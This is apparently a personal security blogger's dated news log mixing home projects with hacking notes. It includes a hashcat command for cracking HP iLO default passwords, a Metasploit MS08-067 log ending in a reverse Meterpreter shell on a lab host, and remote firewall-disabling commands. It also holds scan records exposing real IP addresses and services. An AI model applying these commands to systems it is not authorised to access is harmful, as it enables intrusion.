Security for the Masses
Linkedin Blog
Github
Scripts
Videos
Wishlist
Donate
Origami
Podcast
404.647.4250
freeload101@gmail
Discord:
operat0r
infosec.exchange
techhub.social
Mastodon
JAMBOREE : USB Rubber Ducky Scripts & Payloads Python 3 Arduino
Old news
11/18/2015 - Welcome to Switzerland !
12/14/2014 - Ever wanted to create self extracting installers with ease and free ? Place this SFX folder in the same path as 7zip binary. Name your script install.bat and place all the files in the FILESFGOHERE folder and run the make_sfx.bat or use the included 7z SFX Builder . I got fed up with WinRAR and have now switched to 7zip's SFX key is using the not included 7zS.sfx file to create windows binaries SFX.zip
12/14/2014 - FIXED FU-LASH AUTOMATIC FLASH UPDATE SCRIPT FOR PORTABLE FIREFOX FU-LASH.exe
12/10/2014 - Fixed Cyanide Happiness Explosm.net comics only feed Cyanide_Happiness_Explosm.rss
11/09/2014 - Cat Hacking! It guarantees all food . canned, kibble, a special diet or medication goes straight to the right cat
* Styrofoam cooler flipped upside down
* Ani Mate 305 Elite Super Select Cat Door White (Cat Mate or ANI356) RFID Cat Door
10/07/2014 - Testing apps with tokens ohh my ! Macros Session Handling Burp BurpSuite Synchronizer Token Pattern Anti-CSRF (Cross-Site Request Forgery ).mp4 and faster /less traffic method Recursive_Grep_Burp_BurpSuite_Synchronizer_Token_Pattern_Anti-CSRF.mp4
09/10/2014 - FU-LASH AUTOMATIC FLASH UPDATE SCRIPT FOR PORTABLE FIREFOX FU-LASH.exe
So from what I can tell there is no way to extract the DLLs for flash without having administrator ...MSI just contains the EXE and %TEMP% has nothing useful in it
FlashInstall.log
flashplayer.xpt
FlashPlayerPlugin_15_0_0_152.exe
FlashUtil32_15_0_0_152_Plugin.exe
mms.cfg
NPSWF32_15_0_0_152.dll
plugin.vch
09/01/2014 - Bluetooth gone wild ! Got a mouse working and killed all these services.
09/01/2014 - Hacking HVAC for older units
So I needed to replace my old Thermostat and picked up a 99$ wifi one at HD. Now this is no Nest but ... for 300$ I can write my own script to do whatever...anyway lets get started.
Last time I did this was at an apartment...I managed to wireup the transformer just right to when the AC kicked on it shorted the transformer and blew it up for a big POW! This time however I wanted to get it right-ish ...
Here some comments/notes:
* you need to figure out what kind of unit you have first ( most the new thermos have support for even heat-pump systems)
* there are numerous safety switches around the unit to prevent you from getting popped ... so watch out for stupid switches on plates and light switches for
C- wire etc.. mine has 3 safty cutoffs. One at the panel, one on a light switch and one at the breaker .. I mean really super safe already!
* watch for roof nails in your back and clear the area before you start/ make sure you have all the tools you need up there... ya its 100F out so you don't
want ot have to go up and down the stairs 40 times like myself
* take a photo of the wires before you change anything. Note the Codes RC R Y G C for my 4 wire setup.
* newer stuff has more wires for variable fan speeds so I think that is why they have more wires. That and power for the thermostat itself is run too..err...?
* replace the filters while you are up there too. look around Cleaning Air Conditioner Coils for the big outdoor fan. Be sure its clear of junk and stuff and whutnot ...So if you have a older or cheaper AC unit you may see a 4 wire setup ( gass etc .. NOT heatpump .. )
* look around on maintenance tips like cleaning indoor and outdoor coils ,leveling ,etc
* laser temp to temp difference between intake and outlet on ac in house 16-20 degrees
* I have 3 filters so I removed the aux ones and left the main for better flow ( more filters less flow )
* $4-5k for new unit and bout $100 or so for a checkup/refill ( they say every year ... )
* delay in AC etc so wait about 5min or so and it may take a while to catchup if it has been off for a while in 100F weather ..
My setup:
model nunber: FBF100F14A3
MFG NO NTG3100GFA3
model nunber: NTG3100GFA3
Control Board:
1170063
wiring for AC
http://s3.supplyhouse.com/product_files/1170063%20-%20Product%20Overview.pdf
video of my setup basically
https://www.youtube.com/watch?v=jniws7wqeY4
08/29/2014 - Crack all ILO (HP System Managment) default hashes in <12min
So if you have ever seen a HP system it has the password on the serial number tag. It is 8char and only numbers.
# crack all ILO default hashes -12min on laptop from MSF dump IPMI hashes tool
./hashcat-cli64.exe --remove --outfile=batchcrack.out -m 7300 hashes.txt -a 3 ?d?d?d?d?d?d?d?d
Snip-it of http://rmcurdy.com/scripts/fu.txt
06/16/2014 - Android Aereo Location Hack with Fake GPS
05/15/2014 - Android + Firefox about:config with referer set to 0!
05/04/2014 - New free site uptime using UptimeRobot.com
05/04/2014 - BurpSuite / Android with ease using FS Cert Installer
04/21/2014 - Finally Adblock that actually works: Firefox Beta with Ghostery + Adblock plus on Android
03/12/2014 - Looking for errors ? Here are some Windows Log File Parsers I have been looking at SMS Tracer (tracer32.exe) and LogExpert
I could not think of any more failsause words but here is my current regex for them:
(warn|\berr|fail|unabl|can|not|fault)
03/04/2014 - Some more Android fun on my S4 ! Linux Deploy KitKat Android Metasploit Autopwn Exploiting
03/04/2014 - ATL is 1337 !
02/11/2014 - Updated Parse Nessus binary by melcara.com parse_nessus_xml.v20.pl.exe
01/27/2014 - Ok so I broke down and fixed all the rss feeds. No more Yahoo pipes mess ...
Comics Only Feeds:
XKCD,My Extra Life,Penny Arcade,Cyanide Happiness Explosm,Dilbert,JOT Joy of Tech,CAD Ctrl+Alt+Del,User Friendly,White Ninja Comics only Feed
http://comics.rmccurdy.com
Updated security feeds:
fixed osvdb.org,
Also include: securityfocus,seclists,HelpNetSecurity,us-cert,kb.cert,net-security,securitytracker,darknethackers,professionalsecuritytesters,f-secure,gossamer-threads,taosecurity,securityvulns,SansInstituteAtRiskAll,schneier,exploit-db
http://feeds.rmccurdy.com
01/27/2014 - I did some Powershell FU hunting ! PowerShell_poshcode.org_scripts_ripp_details.tar.gz Anything really that starts with Powershell*
01/04/2014 - Walking in a Android Wonderland!
Cold here in Atlanta and what else to do but play with your new S4 Android phone
My setup:
* T-mobile
* S4 M919
* Gummy-2.1-12-18-13-NIGHTLY-jfltetmo.zip
Plants Vs Zombies 2 free coins DLC v2.1.5.252752 with Freedom v1.0.2 (build 102)
Pinball Arcade 1.5.0 free DLC sqlite3 database editing
11/05/2013 - For the next passive recon engagement you can use something like Shodan.com account and a 277gig (56gigs squashfs) dump of http://scan.to 's 'Critical.IO Service Fingerprints'.
More notes:
https://community.rapid7.com/community/infosec/sonar/blog/2013/09/26/welcome-to-project-sonar
https://delicious.com/operat0r/maltego
example output 'Critical.IO Service Fingerprints' :
==> /s/critical_201303_110.json <==
{ "_id" : { "ip" : "180.210.203.233", "p" : 110, "h" :
"f9c62c212b5f07a50a5326681b50404b" }, "ip" : "180.210.203.233", "port"
: 110, "proto" : "tcp", "banner" : "+OK Dovecot ready.\r\n", "geo" : {
"c" : "SGP", "loc" : [ 1.366700053215027, 103.8000030517578 ] }, "name"
: "pop3", "t" : { "$date" : 1362117610000 } }
==> /s/critical_201303_137.json <==
{ "_id" : { "ip" : "2.94.43.212", "p" : 137, "h" :
"7e5e3348dffb5d577cb2911284e9e61f" }, "ip" : "2.94.43.212", "port" :
137, "proto" : "udp", "banner" : "HARON:00:U WORKGROUP:00:G HARON:20:U
WORKGROUP:1e:G ", "geo" : { "c" : "RUS", "city" : "Saratov", "reg" :
"67", "loc" : [ 51.54059982299805, 46.00859832763672 ] }, "name" :
"netbios", "mac" : "00:53:45:00:00:00", "t" : { "$date" : 1362187777000
} }
==> /s/critical_201303_143.json <==
{ "_id" : { "ip" : "118.97.67.68", "p" : 143, "h" :
"4b011d4102f9d17a772a303969b26221" }, "ip" : "118.97.67.68", "port" :
143, "proto" : "tcp", "banner" : "* OK [CAPABILITY IMAP4rev1 UIDPLUS
CHILDREN NAMESPACE THREAD=ORDEREDSUBJECT THREAD=REFERENCES SORT QUOTA
IDLE ACL ACL2=UNION STARTTLS] Courier-IMAP ready. Copyright 1998-2011
Double Precision, Inc. See COPYING for distribution
information.\r\n", "geo" : { "c" : "IDN", "city" : "Jakarta Pusat",
"reg" : "04", "loc" : [ -6.18179988861084, 106.8223037719727 ] },
"name" : "imap", "t" : { "$date" : 1362117607000 } }
==> /s/critical_201303_161.json <==
{ "_id" : { "ip" : "1.2.137.106", "p" : 161, "h" :
"6944c12cdfd52f04370d448ee19213a2" }, "ip" : "1.2.137.106", "port" :
161, "proto" : "udp", "banner" : "TD-W8101G", "geo" : { "c" : "THA",
"loc" : [ 15, 100 ] }, "name" : "snmp", "t" : { "$date" : 1362318642000
} }
==> /s/critical_201303_17185.json <==
{ "_id" : { "ip" : "90.155.156.200", "p" : 17185, "h" :
"96575231c45faca57afe5c57ce762996" }, "ip" : "90.155.156.200", "port" :
17185, "proto" : "udp", "banner" : "vxworks=VxWorks5.5.1 cpu=41
bsp=BCM1190 A1 boot=host:apptest.bin.gz", "geo" : { "c" : "RUS", "city"
: "Moscow", "reg" : "48", "loc" : [ 55.75220108032227, 37.6156005859375
] }, "name" : "wdbrpc", "vers" : "VxWorks5.5.1", "bsp" : "BCM1190 A1",
"cpu" : 41, "boot" : "host:apptest.bin.gz", "t" : { "$date" :
1362117606000 } }
==> /s/critical_201303_1900.json <==
{ "_id" : { "ip" : "2.50.154.124", "p" : 1900, "h" :
"9f0594e5f41ffd79d94011d932a7d004" }, "ip" : "2.50.154.124", "port" :
1900, "proto" : "udp", "banner" : "Linux/2.4.22-1.2115.nptl UPnP/1.0
miniupnpd/1.0", "geo" : { "c" : "ARE", "city" : "Abu Dhabi", "reg" :
"01", "loc" : [ 24.46669960021973, 54.36669921875 ] }, "name" : "upnp",
"loc" : "http://172.16.2.15:65535/rootDesc.xml", "t" : { "$date" :
1362144088000 } }
==> /s/critical_201303_21.json <==
{ "_id" : { "ip" : "60.18.20.151", "p" : 21, "h" :
"b510f5b81888860ef6e1341875542169" }, "ip" : "60.18.20.151", "port" :
21, "proto" : "tcp", "banner" : "500 OOPS: cannot change
directory:/mnt/usb0/\r\n", "geo" : { "c" : "CHN", "city" : "Shenyang",
"reg" : "19", "loc" : [ 41.79219818115234, 123.4328002929688 ] },
"name" : "ftp", "t" : { "$date" : 1362117628000 } }
==> /s/critical_201303_22.json <==
{ "_id" : { "ip" : "195.112.231.22", "p" : 22, "h" :
"1200ae18e146c736247ca2f36fab898d" }, "ip" : "195.112.231.22", "port" :
22, "proto" : "tcp", "banner" : "SSH-2.0-OpenSSH_5.5p1
Debian-6\r\n\\x00\\x00\\x03\\x0c\n\\x14H\\x8cR\\xc3\\xd5\\x81\\xd4\\xe9D\\xb5w\\xb4\\x9e\\xe9\\x16\\xa6\\x00\\x00\\x00~diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1\\x00\\x00\\x00\\x0fssh-rsa,ssh-dss\\x00\\x00\\x00\\x9daes128-ctr,aes192-ctr,aes256-ctr,arcfour256,arcfour128,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,aes192-cbc,aes256-cbc,arcfour,[email protected]\\x00\\x00\\x00\\x9daes128-ctr,aes192-ctr,aes256-ctr,arcfour256,arcfour128,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,aes192-cbc,aes256-cbc,arcfour,[email protected]\\x00\\x00\\x00ihmac-md5,hmac-sha1,[email protected],hmac-ripemd160,[email protected],hmac-sha1-96,hmac-md5-96\\x00\\x00\\x00ihmac-md5,hmac-sha1,[email protected],hmac-ripemd160,[email protected],hmac-sha1-96,hmac-md5-96\\x00\\x00\\x00\\x15none,[email protected]\\x00\\x00\\x00\\x15none,[email protected]\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00",
"geo" : { "c" : "RUS", "loc" : [ 60, 100 ] }, "name" : "ssh", "t" : {
"$date" : 1362117636000 } }
==> /s/critical_201303_23.json <==
{ "_id" : { "ip" : "60.18.20.151", "p" : 23, "h" :
"874a6e68681c0611523484eba35c2618" }, "ip" : "60.18.20.151", "port" :
23, "proto" : "tcp", "banner" :
"\\xff\\xfd\\x01\\xff\\xfd\\x1f\\xff\\xfd!\\xff\\xfb\\x01\\xff\\xfb\\x03\r\r\n(none)
login: ", "geo" : { "c" : "CHN", "city" : "Shenyang", "reg" : "19",
"loc" : [ 41.79219818115234, 123.4328002929688 ] }, "name" : "telnet",
"t" : { "$date" : 1362117628000 } }
==> /s/critical_201303_25.json <==
{ "_id" : { "ip" : "122.28.43.253", "p" : 25, "h" :
"c22b6805102b553fed9d8d894e2728dc" }, "ip" : "122.28.43.253", "port" :
25, "proto" : "tcp", "banner" : "220 mmm1766.wh.ocn.ne.jp
ESMTP\r\n250-mmm1766.wh.ocn.ne.jp\r\n250-PIPELINING\r\n250-8BITMIME\r\n250
SIZE 0\r\n214 netqmail home page: http://qmail.org/netqmail\r\n221
mmm1766.wh.ocn.ne.jp\r\n", "geo" : { "c" : "JPN", "city" : "Tokyo",
"reg" : "40", "loc" : [ 35.68500137329102, 139.7514038085938 ] },
"name" : "smtp", "t" : { "$date" : 1362117676000 } }
==> /s/critical_201303_3306.json <==
{ "_id" : { "ip" : "201.218.162.140", "p" : 3306, "h" :
"518692dd992c93a6c7fd2cd7954c242d" }, "ip" : "201.218.162.140", "port"
: 3306, "proto" : "tcp", "banner" : "K\\x00\\x00\\x00\\xffj\\x04Host
'scanner.critical.io' is not allowed to connect to this MySQL server",
"geo" : { "c" : "CRI", "loc" : [ 10, -84 ] }, "name" : "mysql", "t" : {
"$date" : 1362117600000 } }
==> /s/critical_201303_443.json <==
{ "_id" : { "ip" : "184.51.177.11", "p" : 443, "h" :
"e2a886a24b45db0c7292996d74bdf230" }, "ip" : "184.51.177.11", "port" :
443, "proto" : "tcp", "banner" : "HTTP/1.0 400 Bad Request\r\nServer:
AkamaiGHost\r\nMime-Version: 1.0\r\nContent-Type:
text/html\r\nContent-Length: 192\r\nExpires: Fri, 01 Mar 2013 06:10:36
GMT\r\nDate: Fri, 01 Mar 2013 06:10:36 GMT\r\nConnection:
close\r\n\r\n<HTML><HEAD>\n<TITLE>Invalid
URL</TITLE>\n</HEAD><BODY>\n<H1>Invalid
URL</H1>\nThe requested URL \"&#47;\", is
invalid.<p>\nReference&#32;&#35;9&#46;8c2e0760&#46;1362118236&#46;10c124\n</BODY></HTML>\n",
"geo" : { "c" : "USA", "city" : "Cambridge", "reg" : "MA", "loc" : [
42.36259841918945, -71.08429718017578 ] }, "name" : "https", "t" : {
"$date" : 1362117638000 } }
==> /s/critical_201303_5353.json <==
{ "_id" : { "ip" : "2.153.136.209", "p" : 5353, "h" :
"11d261a77e5255b558979447d439642f" }, "ip" : "2.153.136.209", "port" :
5353, "proto" : "udp", "banner" : "_http._tcp.local.
_tivo-device._tcp.local.", "geo" : { "c" : "ESP", "loc" : [ 40, -4 ] },
"name" : "mdns", "services" : [ "_http._tcp.local.",
"_tivo-device._tcp.local." ], "t" : { "$date" : 1362231524000 } }
==> /s/critical_201303_53.json <==
{ "_id" : { "ip" : "1.1.255.52", "p" : 53, "h" :
"25cf4b43293bd7f44a9c3bc6d5a891f5" }, "ip" : "1.1.255.52", "port" : 53,
"proto" : "udp", "banner" : "Nominum Vantio 5.2.0.1", "geo" : { "c" :
"THA", "loc" : [ 15, 100 ] }, "name" : "dns", "t" : { "$date" :
1362362374000 } }
==> /s/critical_201303_5900.json <==
{ "_id" : { "ip" : "213.41.163.6", "p" : 5900, "h" :
"6e60270830ad7a9e96fa8ecc2c49394e" }, "ip" : "213.41.163.6", "port" :
5900, "proto" : "tcp", "banner" : "RFB 003.006\n", "geo" : { "c" :
"FRA", "city" : "Paris", "reg" : "A8", "loc" : [ 48.86669921875,
2.333300113677979 ] }, "name" : "vnc", "t" : { "$date" : 1362117640000
} }
==> /s/critical_201303_8080.json <==
{ "_id" : { "ip" : "124.146.31.207", "p" : 8080, "h" :
"c3c27ec69d254ceacdbc5a044c056932" }, "ip" : "124.146.31.207", "port" :
8080, "proto" : "tcp", "banner" : "HTTP/1.0 200 OK\r\nContent-Type:
text/html\r\nCache-Control: no-cache\r\n\r\n\\x00<!DOCTYPE HTML
PUBLIC \"-//W3C//DTD HTML 4.01
Transitional//EN\"\"http://www.w3.org/TR/html4/loose.dtd\"><html><head><meta
http-equiv=\"Content-Type\" content=\"text/html;
charset=gb2312\"><Meta http-equiv=\"Pragma\"
Content=\"No-cach\"><meta http-equiv=\"Window-target\"
content=\"_top\"><script
language=\"javascript\">if (top.location !=
location)top.location.href =
location.href;</script><title>login</title><style
type=\"text/css\">\r\n<!--\r\n\r\n.zhengwenben
{font-size: 16px}\r\n.curstyle {\r\ncolor:
#FFFFFF;\r\nfont-size:16px;\r\n}\r\n.alarm {color:
#FF0000;\r\nfont-size: 16px;\r\n}\r\na:link {\r\ncolor:
#0093A7;\r\ntext-decoration: none;\r\n}\r\na:visited
{\r\ntext-decoration: none;\r\ncolor: #0093A7;\r\n}\r\na:hover
{\r\ntext-decoration: underline;\r\ncolor: #0093A7;\r\n}\r\na:active
{\r\ntext-decoration: none;\r\ncolor: #00FF00;\r\n}\r\n.style3 {color:
#FFFFFF; font-size: 16px; font-weight: bold; }\r\nbody
{\r\nmargin-left: 0px;\r\nmargin-top: 0px;\r\nmargin-right:
0px;\r\nmargin-bottom: 0px;\r\n}\r\nbody,td,th {\r\n\tfont-family:
Arial, Helvetica,
sans-serif;\r\n}\r\n\r\n\r\n-->\r\n</style></head><body><table
border=\"0\" cellpadding=\"0\" cellspacing=\"0\"><tr
bgcolor=\"#0094A8\"><td height=\"107\"
colspan=\"2\"><div
align=\"center\"></div><div
align=\"center\"></div><img
src=\"title.gif\" width=\"999\"
height=\"105\"></td></tr><tr><td
width=\"178\" height=\"492\" valign=\"top\"
bgcolor=\"#0094A8\"><table width=\"130\" align=\"center\"
cellspacing=\"10\"><tr><td>&nbsp;</td></tr><tr><td><span
class=\"style3\">UserLogin</span></td></tr><tr><td>&nbsp;</td></tr><tr><td>&nbsp;</td></tr><tr><td>&nbsp;</td></tr><tr><td>&nbsp;</td></tr><tr><td>&nbsp;</td></tr><tr><td>&nbsp;</td></tr><tr><td>&nbsp;</td></tr><tr><td>&nbsp;</td></tr><tr><td>&nbsp;</td></tr><tr><td>&nbsp;</td></tr><tr><td>&nbsp;</td></tr><tr><td>&nbsp;</td></tr><tr><td>&nbsp;</td></tr><tr><td>&nbsp;</td></tr><tr><td>&nbsp;</td></tr></table></td><td
width=\"821\" valign=\"top\"><table width=\"778\"
height=\"38\" border=\"0\" cellpadding=\"0\"
cellspacing=\"0\"><tr><td>&nbsp;</td><td>&nbsp;</td><td
width=\"663\">&nbsp;</td></tr><tr><td
width=\"26\">&nbsp;</td><td
width=\"89\"><table width=\"85\"
height=\"31\"><tr><td
bgcolor=\"#0093A7\"><div align=\"center\"
class=\"curstyle\"><strong>UserLogin</strong></div></td></tr></table></td>
<td><table height=\"31\" align=\"right\">
<tr><td><form name=languageform
method=\"post\"><div align=\"right\"><a
href=javascript:document.languageform.submit();>\\xd6\\xd0
\\xce\\xc4</a>&nbsp;&nbsp;<font
color=\"0093A7\">English</font>&nbsp;</div><input
type=\"hidden\" name=\"language\"
value=\"1\"></form></td></tr></table></tr><tr><td></td><td
colspan=\"2\"
bgcolor=\"#0093A7\"></td></tr></table><form
name=login action=./main.htm method=post><table
width=\"780\" border=\"0\"
align=\"left\"><tr><td
width=\"21\">&nbsp;</td><td
width=\"85\" class=\"zhengwenben\"><div
align=\"center\">Password</div></td><td
width=\"660\"><input name=\"loginPwd\" type=\"password\"
size=\"15\" maxlength=\"25\" value=\"\"><input
type=\"submit\" name=\"login\" value=\" Login
\"></td></tr><SCRIPT
language=javascript>\r\n<!--\r\n\r\ndocument.login.loginPwd.focus();\r\n\r\n//-->\r\n</SCRIPT><tr><td>&nbsp;</td><td><div
align=\"right\">
</div></td><td>&nbsp;</td></tr></table></form></td></tr></table></body></html>",
"geo" : { "c" : "KOR", "loc" : [ 37, 127.5 ] }, "name" : "http-proxy",
"t" : { "$date" : 1362117600000 } }
==> /s/critical_201303_80.json <==
{ "_id" : { "ip" : "113.170.215.155", "p" : 80, "h" :
"a0dbbca9eb55d7a8e524faa2f9f4da03" }, "ip" : "113.170.215.155", "port"
: 80, "proto" : "tcp", "banner" : "HTTP/1.1 401
Unauthorized\r\nWWW-Authenticate: Basic
realm=\"SmartAX\"\r\nContent-Type: text/html\r\nServer: RomPager/4.07
UPnP/1.0\r\n\r\n<html>\n<head>\n<title>Protected
Object</title></head><body>\n<h1>Protected
Object</h1>This object on the RomPager server is
protected", "geo" : { "c" : "VNM", "city" : "Vung Tau", "reg" : "45",
"loc" : [ 10.35000038146973, 107.0667037963867 ] }, "name" : "http",
"t" : { "$date" : 1362117600000 } }
==> /s/critical_201303_993.json <==
{ "_id" : { "ip" : "103.14.43.88", "p" : 993, "h" :
"298c2ac4faa62cebdd7f642b09c76a34" }, "ip" : "103.14.43.88", "port" :
993, "proto" : "tcp", "banner" : "* OK [CAPABILITY IMAP4rev1 LITERAL+
SASL-IR LOGIN-REFERRALS ID ENABLE AUTH=PLAIN AUTH=LOGIN] Dovecot
ready.\r\n", "geo" : null, "name" : "imaps", "t" : { "$date" :
1362117607000 } }
==> /s/critical_201303_995.json <==
{ "_id" : { "ip" : "184.154.230.133", "p" : 995, "h" :
"7c668c5111c15554b7c42f3b1ad8bd2f" }, "ip" : "184.154.230.133", "port"
: 995, "proto" : "tcp", "banner" : "+OK \r\n", "geo" : { "c" : "USA",
"city" : "Chicago", "reg" : "IL", "loc" : [ 41.88249969482422,
-87.64409637451172 ] }, "name" : "pop3s", "t" : { "$date" :
1362117673000 } }
09/21/2013 - Phreaknic Talk - Command Line FU and J00
09/05/2013 - MediaCoder using GPU with OpenCL !
08/17/2013 - ANDROID + CHROOT + BACKTRACK IMAGE = PWNAGE
msf exploit(ms08_067_netapi) > uname -a
[*] exec: uname -a
Linux localhost 2.6.35.14-cyanogenmod
#1 PREEMPT Mon Nov 26 06:41:27 EST 2012 armv7l
GNU/Linux
msf exploit(ms08_067_netapi) > nmap --script
smb-check-vulns.nse --script-args=unsafe=1 -p445
192.168.1.116 --open
[*] exec: nmap --script smb-check-vulns.nse
--script-args=unsafe=1 -p445 192.168.1.116 --open
Starting Nmap 5.00 ( http://nmap.org ) at 2013-08-17 07:22 UTC
Interesting ports on 192.168.1.116:
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 00:0C:29:A7:22:08 (VMware)
Host script results:
| smb-check-vulns:
|_ MS08-067: VULNERABLE
Nmap done: 1 IP address (1 host up) scanned in 1.87 seconds
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 192.168.1.110:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 0 / 1 - lang:English
[*] Selected Target: Windows XP SP0/SP1 Universal
[*] Attempting to trigger the vulnerability...
[*] Sending stage (749056 bytes) to 192.168.1.116
[*] Meterpreter
session 1 opened (192.168.1.110:4444 ->
192.168.1.116:1033) at Sat Aug 17 07:23:18 +0000 2013
07/29/2013 - Compiled parse_nessus_xml.v18.pl so it can be portable parse_nessus_xml.v18.pl.exe I had to add PIE to the end because pp PAR::Packer does not include the types use Excel::Writer::XLSX::Chart::Pie;
07/03/2013 - How can I prevent Ask.com Toolbar from being installed every time Java is updated
Reg Add "HKLM\SOFTWARE\JavaSoft" /V "SPONSORS" /D DISABLE /T reg_sz /F
Reg Add "HKLM\SOFTWARE\Wow6432Node\JavaSoft" /V "SPONSORS" /D DISABLE /T reg_sz /F
06/30/2013 - Disable Skydrive/Upload Center in Office 2013
Reg Add "HKCU\software\policies\microsoft\office\common\webintegration"
/V "webintegrationenabled" /D 0 /T REG_DWORD /F
Reg Add "HKLM\software\policies\microsoft\office\common\webintegration"
/V "webintegrationenabled" /D 0 /T REG_DWORD /F
Reg Add "HKCU\Software\Microsoft\Office\15.0\Common\SignIn" /V
"SignInOptions" /D 3 /T REG_DWORD /F
Reg Add "HKLM\Software\Microsoft\Office\15.0\Common\SignIn" /V
"SignInOptions" /D 3 /T REG_DWORD /F
del /s/q c:\MSOUC.EXE
del /s/q c:\MSOSYNC.EXE
06/18/2013
- Made sight covers from Lexan ! Once hit point blank ~400FPS/20BBs you can still see but sight is compromised but at least you are protected...
http://www.youtube.com/watch?v=DR5wCEbs_ik
PHOTO:
06/13/2013
- So android app Android-vnc-viewer stores passwords in plain text on the database yay !
path to the database VncDatabase > CONNECTION_BEAN > PASSWORD
Here is the src:
android-vnc-viewer
05/18/2013 - Updated/fixed OCLHashcat batch script to include rule based
attacks. I use the 18_in_1.lst 38gig wordlist batchcrack_rmccurdy.sh
05/17/2013 - SSH > FreeNX > Remote Desktop (RDP) > UltraVNC !??!??!?!???
So I recently installed UltraVNC onto my gaming desktop so I can do GPU cracking remotely using OCLHashcatPlus. What I found out quickly was that UltraVNC by default is in VIEW only mode
now. So what now ? Ok so I can t VNC into that box but I do have SSH open on my home mythbox (Ubuntu). So I installed FreeNX client. This basically allows for easy remote desktop on Ubuntu over SSH. You need to install the support files in Ubuntu basic guide posted here https://help.ubuntu.com/community/NomachineNX . Once you get it setup I use the string gnome-session --session=ubuntu-2d with some luck it should login the normal desktop. In some cases I just have to play with the settings.
ScreenShot of FreeNX :
I was able to log into my Ubuntu box from the internet over SSH. So I fired up Remmina great remote access tool that supports RDP for
Ubuntu. Great guess what RDP is not enabled by default in windows 7 Humm I think I can do this over CLI but how from a linux box
??!? WinEXE to the rescue. It looks something like this.
http://askubuntu.com/questions/263432/how-to-install-winexe-on-ubuntu
winexe --user admin --password=OHNOESMYPASSWORDHERE
//192.168.1.111 c:\\windows\\system32\\cmd.exe
Enable RDP over command line
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
Yay now I have RDP enabled ! Wait why is it not working
??!? lets check the port .
nmap -p 3389 192.168.1.111
Starting Nmap 6.25 ( http://nmap.org ) at 2013-05-17 17:41 Eastern
Daylight Time
Nmap scan report for (192.168.1.111)
Host is up (0.034s latency).
PORT
STATE SERVICE
3389/tcp filtered ms-wbt-server
Nmap done: 1 IP address (1 host up) scanned in 1.55 seconds
Great filtered stupid firewall .. Ok so let s disable the firewall
using winexe cmd prompt like we did when enableding RDP
netsh advfirewall set AllProfiles state off
Ok ok .. so now we are set ! all ready to SSH > FREENX
> RDP so we can change the stupid UltraVNC from viewer only mode so I can remote into the Gaming box with Vnc client and click like a PRO !
|
05/03/2013 - Patched katalina.sh based on karma.rc to kill networking bins,apparmor and use dhcpd and not dhcpd3 katalina_patched.sh
05/02/2013 - Stop Charter from hijacking DNS
echo 'bogus-nxdomain=69.16.143.25' >> /etc/dnsmasq.conf
echo 'bogus-nxdomain=66.152.109.25' >> /etc/dnsmasq.conf
echo 'bogus-nxdomain=198.105.244.24' >> /etc/dnsmasq.conf
echo 'bogus-nxdomain=209.15.13.134' >> /etc/dnsmasq.conf
/etc/init.d/dnsmasq restart
Basicly nslookup SOMETHINGRANDN.com and any IP you get back add to the list ..
04/22/2013 - Moved the web server to Amazon AWS EC2 go crazy china and RBN !
04/01/2013
- rssdler + rtorrent + showrss.karmorra.info = Automatically download torrents
with rtorrent and RSS feeds
Example rssdler Config file:
[email protected]:/usr/share/rssdler042/config#
cat config.txt
[global]
downloadDir =
/usr/share/rssdler042/config/
workingDir =
/usr/share/rssdler042/config
log = 5
logFile = /usr/share/rssdler042/config/downloads.log
verbose = 5
cookieFile =
/usr/share/rssdler042/config/cookies.txt
cookieType =
MozillaCookieJar
scanMins = 10
sleepTime = 2
runOnce =
True
urllib = True
[somesite]
link =
http://showrss.karmorra.info/rss.php?user_id=126337&hd=1&proper=1&namespaces=true
regExTrue =
\d[^\d]+\d
regExFalse =
(nrg|ccd)
download1 = .
download1True
= False
|
Example .rtorrent.rc
rtorrent file :
cat ~/.rtorrent.rc
schedule = watch_directory,5,5,load_start=/home/mythtv/downloads/complete/RTORRENT/*.torrent
session = ~/.session
upload_rate = 70
port_range = 55556-55660
directory = /home/mythtv/downloads/complete/RTORRENT/
|
Example loop
Script:
#rm downloads.log savedstate.dat daemon.info
rssdler -r -c /usr/share/rssdler042/config/config.txt
chmod 755 *.torrent
move *.torrent /home/mythtv/downloads/complete/RTORRENT/
|
Example output:
[email protected]:/usr/share/rssdler042/config#
rssdler -r -c /usr/share/rssdler042/config/config.txt
INFO --- RSSDler 0.4.2
DEBUG writing daemonInfo
INFO [Waking up] Mon Apr 1 18:02:45 2013
DEBUG checking working dir, maybe changing dir
INFO Scanning threads
INFO finding new downloads in thread somesite
DEBUG encoding url
http://showrss.karmorra.info/rss.php?user_id=126337&hd=1&proper=1&namespaces=true
DEBUG testing cookieFile settings
DEBUG attempting to load cookie type: MozillaCookieJar
DEBUG building and installing urllib opener without cookies
DEBUG grabbing page at url
http://showrss.karmorra.info/rss.php?user_id=126337&hd=1&proper=1&namespaces=true
DEBUG setting ttl
DEBUG unQuoteReQuote
http://showrss.karmorra.info/r/6f4892260da9069324c94ae5d8d79a38.torrent
DEBUG already downloaded http://showrss.karmorra.info/r/6f4892260da9069324c94ae5d8d79a38.torrent
DEBUG unQuoteReQuote
http://showrss.karmorra.info/r/373406b558b5c4f8710ad2d259ffa9dc.torrent
DEBUG already downloaded
http://showrss.karmorra.info/r/373406b558b5c4f8710ad2d259ffa9dc.torrent
DEBUG unQuoteReQuote
http://showrss.karmorra.info/r/da4397ed9df9f2475d36609c66205a26.torrent
DEBUG already downloaded
http://showrss.karmorra.info/r/da4397ed9df9f2475d36609c66205a26.torrent
DEBUG unQuoteReQuote http://showrss.karmorra.info/r/e2bf65b44ac8da445b6080c15466fb9a.torrent
DEBUG already downloaded
http://showrss.karmorra.info/r/e2bf65b44ac8da445b6080c15466fb9a.torrent
DEBUG unQuoteReQuote
http://showrss.karmorra.info/r/15ab8999ac01fc4b7a75a9ced74e8127.torrent
DEBUG already downloaded http://showrss.karmorra.info/r/15ab8999ac01fc4b7a75a9ced74e8127.torrent
